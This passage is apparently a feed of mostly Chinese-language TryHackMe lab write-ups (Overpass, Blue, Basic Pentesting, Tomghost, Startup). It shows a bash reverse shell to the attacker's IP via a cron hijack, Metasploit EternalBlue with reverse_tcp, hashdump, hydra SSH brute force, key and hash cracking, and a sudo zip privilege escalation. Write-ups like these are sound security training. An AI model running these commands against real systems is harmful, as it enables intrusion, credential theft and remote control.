&lt;li&gt;&lt;code&gt;scp -i James_key.pem ../linpeas.sh james@10.10.214.180:/home/james&lt;/code&gt;馬上就噴出了一個很重要的 Cron job- 小豌豆好棒棒!!!&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7f03b-AdxffbY.png"&gt;&lt;/li&gt;
&lt;li&gt;每分鐘會用 root 權限 &lt;code&gt;curl&lt;/code&gt; 一次 &lt;code&gt;overpass.thm&lt;/code&gt; 的網址，然後把值丟去bash發現 &lt;code&gt;/etc/hosts&lt;/code&gt; 沒有設權限- 所以我們可以把 &lt;code&gt;overpass.thm&lt;/code&gt; 轉到自己的伺服器上&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d37dc-IBeuwFc.png"&gt;在自己的電腦上準備一個資料夾路徑- &lt;code&gt;downloads/src/buildscript.sh&lt;/code&gt; 的檔案&lt;/li&gt;
&lt;li&gt;內容物為自己的 Reverse shell&lt;code&gt;bash -c 'bash -i &amp;gt;&amp;amp; /dev/tcp/10.14.7.198/7877 0&amp;gt;&amp;amp;1'&lt;/code&gt;然後在自己的電腦上開一下 &lt;code&gt;nc&lt;/code&gt; 進行監聽- &lt;code&gt;nc -vlk 7877&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/c6fde-Lom2bma.png"&gt;開啟 Python server- &lt;code&gt;python3 -m http.server&lt;/code&gt;攻擊戳回來了!!!- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7273a-0YbxxeO.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/2b942-Yow9Uze.png"&gt;取得 root flag- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/3fb0e-H4HLJ1V.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;thm{7f336f8c359dbac18d54fdd64ea753bb}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Blue (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/25/blue-try-hack-me-writeup/</link><pubDate>Sun, 25 Jul 2021 23:54:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/25/blue-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/blue"&gt;https://tryhackme.com/room/blue&lt;/a&gt;&lt;br&gt;
IP : 10.10.158.118&lt;/p&gt;
&lt;h2 id="recon"&gt;Recon&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Q: How many ports are open with a port number under 1000?&lt;code&gt;nmap -p 1-1000 10.10.158.118&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;回傳 3 個135/tcp open msrpc&lt;/li&gt;
&lt;li&gt;139/tcp open netbios-ssn&lt;/li&gt;
&lt;li&gt;445/tcp open microsoft-ds老規矩習慣的 &lt;code&gt;nmap -A 10.10.158.118&lt;/code&gt; 看看- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/22266-Dxug1il.png"&gt;Q: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)- nmap 看到的 Windows7 版本拿去 Google&lt;code&gt;windows 7 professional 7601 service pack 1 exploit&lt;/code&gt;就會出現 &lt;code&gt;MS17-010&lt;/code&gt; EternalBlue&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="metasploit"&gt;Metasploit&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;開啟 &lt;code&gt;msfconsole&lt;/code&gt;搜尋 &lt;code&gt;search MS17-010&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;選擇 &lt;code&gt;exploit/windows/smb/ms17_010_eternalblue&lt;/code&gt;輸入 &lt;code&gt;use exploit/windows/smb/ms17_010_eternalblue&lt;/code&gt;- 輸入 &lt;code&gt;show options&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;設定需要的 options&lt;code&gt;set RHOSTS 10.10.158.118&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;set LHOST 10.14.7.198&lt;/code&gt;輸入 &lt;code&gt;set payload windows/x64/shell/reverse_tcp&lt;/code&gt;輸入 &lt;code&gt;exploit&lt;/code&gt;- 成功拿到 shell!&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/1d608-7zwssuS.png"&gt;&lt;/li&gt;
&lt;li&gt;輸入 &lt;code&gt;whoami&lt;/code&gt; 可以發現，其實已經是 &lt;code&gt;system&lt;/code&gt; 權限了&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="使用-meterpreter"&gt;使用 Meterpreter&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;存參https://paper.seebug.org/29/簡單來說，Meterpreter是提供給&amp;quot;後滲透&amp;quot;使用- 也就是說，比起cmd有更多方便的功能醬子&lt;/li&gt;
&lt;li&gt;例如 &lt;code&gt;getsystem&lt;/code&gt; 可自動提權Google &lt;code&gt;shell_to_meterpreter&lt;/code&gt;- 取得 &lt;code&gt;post/multi/manage/shell_to_meterpreter``use post/multi/manage/shell_to_meterpreter&lt;/code&gt;- &lt;code&gt;show options&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;set LHOST 10.14.7.198&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;確定剛剛我們 ctrl + z 的 session輸入 &lt;code&gt;sessions&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/4650a-6g0oAXX.png"&gt;&lt;code&gt;set SESSION 1``run&lt;/code&gt;- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/89610-HkESyhT.png"&gt;輸入 &lt;code&gt;sessions&lt;/code&gt;- 可以看到目前有兩個 session&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/383c0-0OfEmDn.png"&gt;&lt;/li&gt;
&lt;li&gt;選第 2 個輸入 &lt;code&gt;sessions 2&lt;/code&gt;進入 shell- 輸入 &lt;code&gt;shell&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;輸入 &lt;code&gt;whoami&lt;/code&gt;確定目前自己是 &lt;code&gt;nt authority\system&lt;/code&gt;按下 Ctrl + Z 回到 Meterpreter 選單- 輸入 &lt;code&gt;ps&lt;/code&gt; 觀察目前系統執行的 process&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/6caa7-jxtBWA8.png"&gt;尋找最後一個 process&lt;code&gt;3056 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe&lt;/code&gt;輸入 &lt;code&gt;migrate 3056&lt;/code&gt; 遷移到 PID 上輸入 &lt;code&gt;hashdump&lt;/code&gt;- 可以看到不同使用者的 hash&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/ebb1e-ErNJNT7.png"&gt;&lt;/li&gt;
&lt;li&gt;看起來一般的使用者應該是 Jon把 &lt;code&gt;Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::&lt;/code&gt; 存成 txt 用 john 來破- &lt;code&gt;john jon.txt --format=NT --wordlist=/opt/rockyou.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;1 秒鐘就爆出來ㄌ &lt;code&gt;alqfna22&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="各種-flag"&gt;各種 Flag&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Flag1? This flag can be found at the system root.&lt;code&gt;type flag1.txt``flag{access_the_machine}&lt;/code&gt;Flag2? This flag can be found at the location where passwords are stored within Windows.- 他說 Flag 存在 Windows 存密碼的地方&lt;/li&gt;
&lt;li&gt;Windows 的密碼 hash 存在 &lt;code&gt;C:\Windows\System32\config&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;裡面有 `type flag2.txt``flag{sam_database_elevated_access}flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.- 其實我覺得這裡有一點點暴力，但這一題真的有點通靈&lt;/li&gt;
&lt;li&gt;已經發現前兩隻 flag 檔名是 &lt;code&gt;flag1.txt&lt;/code&gt; , &lt;code&gt;flag2.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;所以我想說直接在 C槽 根目錄爆搜&lt;code&gt;dir flag*.txt /s /p&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/74cc4-StiISuC.png"&gt;&lt;/li&gt;
&lt;li&gt;然後就噴出來ㄌ www&lt;/li&gt;
&lt;li&gt;&lt;code&gt;flag{admin_documents_can_be_valuable}&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;這也提醒我們，可以觀察使用者的 Documents 或 Desktop但據我所知大多數的台灣人並沒有用 &amp;ldquo;我的文件&amp;rdquo; ㄉ習慣 www&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Basic Pentesting (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/24/basic-pentesting-try-hack-me-writeup/</link><pubDate>Sat, 24 Jul 2021 23:51:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/24/basic-pentesting-try-hack-me-writeup/</guid><description>&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/basicpentestingjt"&gt;https://tryhackme.com/room/basicpentestingjt&lt;/a&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Target IP : &lt;code&gt;10.10.165.235&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="scanning"&gt;Scanning&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;nmap -A 10.10.165.235&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-24 04:40 EDT
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Nmap scan report for 10.10.165.235
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host is up (0.27s latency).
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Not shown: 994 closed ports
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;PORT STATE SERVICE VERSION
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| ssh-hostkey:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_ 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn&amp;#39;t have a title (text/html). 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) | ajp-methods: | Supported methods: GET HEAD POST OPTIONS
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;8080/tcp open http Apache Tomcat 9.0.7
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-favicon: Apache Tomcat
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;|_http-title: Apache Tomcat/9.0.7
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#282a36;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-fallback" data-lang="fallback"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Host script results:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; |_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 0s
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; |_nbstat: NetBIOS name: BASIC2, NetBIOS user: , NetBIOS MAC: (unknown)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | smb-os-discovery:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | Computer name: basic2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | NetBIOS computer name: BASIC2\x00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | Domain name: \x00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | FQDN: basic2
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; |_ System time: 2021-07-24T04:41:05-04:00
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | smb-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | account_used: guest
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | authentication_level: user
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | challenge_response: supported
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; |_ message_signing: disabled (dangerous, but default)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | smb2-security-mode:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | 2.02:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; |_ Message signing enabled but not required
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | smb2-time:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; | date: 2021-07-24T08:41:04
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; |_ start_date: N/A
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; Nmap done: 1 IP address (1 host up) scanned in 52.95 seconds
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;The open port is22 SSH&lt;a href="https://www.exploit-db.com/exploits/40136"&gt;OpenSSH 7.2p2 - Username Enumeration&lt;/a&gt;80 HTTP- Apache/2.4.18 : no vulnerability139、445 SMB- Samba smbd 4.3.11-Ubuntu : no vulnerability8009 AJP138080 Tomcat&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="access-website-80-port"&gt;Access Website (80 port)&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Use dirsearch&lt;code&gt;python3 dirsearch.py -u http://10.10.165.235/ -e all&lt;/code&gt;Question1 : What is the name of the hidden directory on the web server(enter name without /)?- developmentAfter access the development page, we can get 2 files- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/7ad3a-h9T1zYV.png"&gt;&lt;/li&gt;
&lt;li&gt;They are some mail from J and K to talk about some upgrade smb issue.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="try-to-find-the-username"&gt;Try to find the username&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;enum4linux 10.10.165.235 -a&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/30e0e-ccICsWv.png"&gt;&lt;/li&gt;
&lt;li&gt;So there are 2 username we find&lt;code&gt;kay&lt;/code&gt; and &lt;code&gt;jan&lt;/code&gt;Although the verison of SSH services is 7.2p2, it has a vulnerability with Username Enumeration- &lt;a href="https://www.exploit-db.com/exploits/40136"&gt;https://www.exploit-db.com/exploits/40136&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;But I have tried and it doesn&amp;rsquo;t work&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/a4778-Xwze4iP.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="what-is-the-password"&gt;What is the password?&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;We need to burp force the password for these 2 users&lt;/li&gt;
&lt;li&gt;Use hydra to check with rockyou.txt&lt;code&gt;hydra -l kay -P /opt/rockyou.txt ssh://10.10.165.235&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;hydra -l jan -P /opt/rockyou.txt ssh://10.10.165.235&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8d930-77oZcJ3.png"&gt;&lt;/li&gt;
&lt;li&gt;We find the password : &lt;code&gt;armando&lt;/code&gt; with user &lt;code&gt;jan&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="login-into-ssh-services-with-jans-credential"&gt;Login into ssh services with jan&amp;rsquo;s credential&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ssh jan@10.10.165.235&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;We are login with jan, but we can&amp;rsquo;t cat &lt;code&gt;/home/kay/pass.bak&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/611e6-2dQSsQP.png"&gt;And then we find some cool things at `/home/kay/.ssh‵- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/de435-bkNLRzZ.png"&gt;&lt;/li&gt;
&lt;li&gt;This is the login key file he/she forgot to remove, so we can login with ssh without password, we can try to scp it to our computer by &lt;code&gt;scp -r jan@10.10.165.235:/home/kay/.ssh .&lt;/code&gt;Use ssh command to try to login with kay- &lt;code&gt;chmod 600 id_rsa&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ssh kay@10.10.165.235 -i id_rsa&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/baff7-ZYwW4DA.png"&gt;&lt;/li&gt;
&lt;li&gt;But the key file needs password, so we need to crak&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="crack-ssh-key"&gt;Crack ssh key&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Use &lt;a href="https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py"&gt;ssh2john&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;python ssh2john.py id_rsa &amp;gt; john_ssh&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d4024-q9iN7v4.png"&gt;Run john with wordlist rockyou- &lt;code&gt;john john_ssh --wordlist=/opt/rockyou.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cdba0-m2Dtw1b.png"&gt;&lt;/li&gt;
&lt;li&gt;So password is &lt;code&gt;beeswax&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="use-key-file-and-password-to-login-with-ssh"&gt;Use key file and password to login with ssh&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d7904-uUwKzEO.png"&gt;&lt;/li&gt;
&lt;li&gt;And we can find the final flag!&lt;code&gt;heresareallystrongpasswordthatfollowsthepasswordpolicy&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="final-screenshot"&gt;Final Screenshot&lt;/h2&gt;
&lt;p&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d8bda-yPvQ7E1.png"&gt;&lt;/p&gt;</description></item><item><title>Tomghost (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/24/tomghost-try-hack-me-writeup/</link><pubDate>Sat, 24 Jul 2021 13:28:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/24/tomghost-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/tomghost"&gt;https://tryhackme.com/room/tomghost&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;IP : 10.10.9.138&lt;/p&gt;
&lt;h2 id="scanning"&gt;Scanning&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;nmap -A 10.10.9.138&lt;/code&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/82466-KJKjqsB.png"&gt;&lt;/li&gt;
&lt;li&gt;有開的 port22 SSH 7.2ps&lt;/li&gt;
&lt;li&gt;53 tcpwarpped&lt;/li&gt;
&lt;li&gt;8009 AJP13 1.3&lt;/li&gt;
&lt;li&gt;8080 Tomcat 9.0.30&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="exploit"&gt;Exploit&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;使用 searchsploit 搜尋 AJP&lt;code&gt;searchsploit AJP&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;可以找到 &lt;code&gt;Apache Tomcat - AJP 'Ghostcat File Read/Inclusion&lt;/code&gt;&lt;a href="https://www.exploit-db.com/exploits/48143%60wget"&gt;https://www.exploit-db.com/exploits/48143`wget&lt;/a&gt; &lt;a href="https://www.exploit-db.com/download/48143%60%60mv"&gt;https://www.exploit-db.com/download/48143``mv&lt;/a&gt; 48143 48143.py``python 48143.py`- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/25613-0SQat66.png"&gt;&lt;/li&gt;
&lt;li&gt;就直接噴出帳號密碼ㄌ帳號 : &lt;code&gt;skyfuck&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;密碼 : &lt;code&gt;8730281lkjlkjdqlksalks&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ssh-進去晃晃"&gt;SSH 進去晃晃&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ssh skyfuck@10.10.9.138&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;發現家目錄裡面有兩個檔案&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/5434b-hq6I5CF.png"&gt;&lt;/li&gt;
&lt;li&gt;先抓出來&lt;code&gt;scp -r skyfuck@10.10.9.138:/home/skyfuck .&lt;/code&gt;在 &lt;code&gt;/home/merlin&lt;/code&gt; 發現 &lt;code&gt;user.txt&lt;/code&gt;- &lt;code&gt;THM{GhostCat_1s_so_cr4sy}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="暴力破解-pgp"&gt;暴力破解 pgp&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;看到一個 asc 檔案 跟一個 pgp 檔案用 file 觀察他們在幹嘛&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8edbb-OmGBxmK.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.pgp&lt;/code&gt; 是加密後ㄉ東西&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.asc&lt;/code&gt; 的是 private keypgp 轉 john- &lt;code&gt;gpg2john tryhackme.asc &amp;gt; john_gpg&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;備註 : gpg 是開源版本的 pgpref :　https://zh.wikipedia.org/wiki/PGP我們要破的是 &lt;code&gt;.asc&lt;/code&gt; 的 private key 檔案求密碼用 john 爆破，With rockyou.txt- &lt;code&gt;john john_gpg --wordlist=/opt/rockyou.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/d3da7-cl2k7x5.png"&gt;&lt;/li&gt;
&lt;li&gt;破出密碼為 &lt;code&gt;alexandru``gpg --decrypt credential.pgp&lt;/code&gt;- 輸入密碼&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/30489-Y1D3ND3.png"&gt;取得 &lt;code&gt;merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="提權"&gt;提權&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;su merlin&lt;/code&gt;輸入密碼&lt;code&gt;sudo -l&lt;/code&gt;- &lt;code&gt;(root : root) NOPASSWD: /usr/bin/zip&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;發現有 zip 的 sudo 權限到 &lt;a href="https://gtfobins.github.io/"&gt;GTFOBins&lt;/a&gt; 找 zip 提權方法- 可以 sudo 的&lt;code&gt;TF=$(mktemp -u)&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;sudo zip $TF /etc/hosts -T -TT 'sh #'&lt;/code&gt;提權成功- &lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/71f04-CuifiyF.png"&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;root.txt&lt;/code&gt; : &lt;code&gt;THM{Z1P_1S_FAKE}&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Startup (Try Hack Me Writeup)</title><link>http://blog.stevenyu.tw/2021/07/24/startup-try-hack-me-writeup/</link><pubDate>Sat, 24 Jul 2021 13:22:00 +0800</pubDate><guid>http://blog.stevenyu.tw/2021/07/24/startup-try-hack-me-writeup/</guid><description>&lt;blockquote&gt;
&lt;/blockquote&gt;
&lt;p&gt;URL : &lt;a href="https://tryhackme.com/room/startup"&gt;https://tryhackme.com/room/startup&lt;/a&gt;&lt;br&gt;
Target IP : 10.10.37.216&lt;/p&gt;
&lt;h2 id="scan"&gt;Scan&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;老規矩 nmap 起手式&lt;code&gt;nmap -A 10.10.37.216&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/cf5df-gD14ZAk.png"&gt;&lt;/li&gt;
&lt;li&gt;有開21 FTPnmap 說 Anonymous allow22 SSH80 網頁掃網頁路徑- &lt;code&gt;python3 dirsearch.py -u http://10.10.37.216/ -e all&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;可能有用的路徑&lt;code&gt;http://10.10.37.216/files/&lt;/code&gt;裡面有一段話，跟 meme&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/8f801-sQxCqzk.png"&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ftp"&gt;FTP&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ftp 10.10.37.216&lt;/code&gt;帳號 : &lt;code&gt;Anonymous&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;密碼 : 空白&lt;/li&gt;
&lt;li&gt;&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/63152-SyLMZqo.png"&gt;&lt;/li&gt;
&lt;li&gt;發現路徑就是網頁伺服器的files嘗試上傳檔案- 根目錄(網頁的 &lt;code&gt;files&lt;/code&gt;)&lt;img loading="lazy" src="http://blog.stevenyu.tw/uploads/2022/02/405fc-1bxN7s9.png"&gt;&lt;/li&gt;
